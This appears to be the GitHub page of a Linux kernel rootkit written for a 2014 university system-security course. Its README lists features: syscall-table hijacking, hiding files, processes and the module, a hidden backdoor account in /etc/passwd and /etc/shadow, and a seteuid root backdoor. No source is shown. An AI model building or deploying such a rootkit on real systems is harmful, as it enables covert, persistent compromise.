Skip to content

kevinkoo001/rootkit

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

27 Commits

headers

headers

 
 

src

src

 
 

Makefile

Makefile

 
 

README

README

 
 

build.sh

build.sh

 
 

flush.sh

flush.sh

 
 

Repository files navigation

/**********************************************************
	Last Updated: Nov 16, 2014
	CSE509 System Security 2014 Fall @CS SBU
	Written By: 
		Hyungjoon Koo (hykoo@cs.stonybrook.edu)
		Yaohui Chen (yaohchen@cs.stonybrook.edu)
***********************************************************/

A. The Rootkit Framework
	Platform
		Tested at ubuntu linux 12.04 LTS kernel 3.2.0-29-generic
		Should be working 3.x kernel version with an appropriate syscall table addr

	Module name
		kcr.ko
		Koo-Chen-Rootkit
		Kernel Cracking Rootkit
		
	Directory structure
		src/kcr.c : 
			Define main function
			Does device registration 
			Hijack linux system call table

		src/dev.c : 
			Misc device operations
			read, write, open, etc

		src/helpers.c: 
			Define helper functions

		src/HJ_x.c:  
			Functions related to hijacking a ¡°x¡± system call 
			All hijackings follow the same patterns
				i.e HJ_ls.c, HJ_ps.c, HJ_read.c, etc.
		
		src/backdoor.c
			Allows a backdoor when having a specific seteuid

		headers/dev.h
		headers/helpers.h
		headers/HJ_ls.h
			Describe headers to the corresponding source code

		headers/all.h: 
			Describe common <linux/*> or <asm/*>  headers
			Include all src/*.c files just for convenience :)

		headers/config.h: 
			Include all.h, and global variables and macros


B. Features (http://securitee.org/teaching/cse509/files/projects/project1.html)
	Required implementation
		Hide specific files and directories from showing up when a user does "ls" and similar commands
			Hide defined prefixes (i.e hide_, bad_, )
			Support dynamically changed prefixes
		Modify the /etc/passwd and /etc/shadow file to add a backdoor account 
			while returning the original contents of the files (pre-attack) 
			when a normal user requests to see the file (sys_read)
		Hides processes from the process table when a user does a "ps"
	Additional implementation
		Key logging (Not yet)
			Either saving keystrokes to local file or sending it out to remote site
		Backdoor
			Allowing a normal program to have a root privilege
		Hide the connections (Not yet)
			Opening/listening ports
			i.e netstat
		Hide the rootkit module itself 
			i.e lsmod
			
C. Usage
	$ make && sudo insmod kcr.ko

About

This project has been done with Chen as part of system security course at SBU CS.

Resources

Readme
Activity

Stars

11 stars

Watchers

2 watching

Forks

9 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages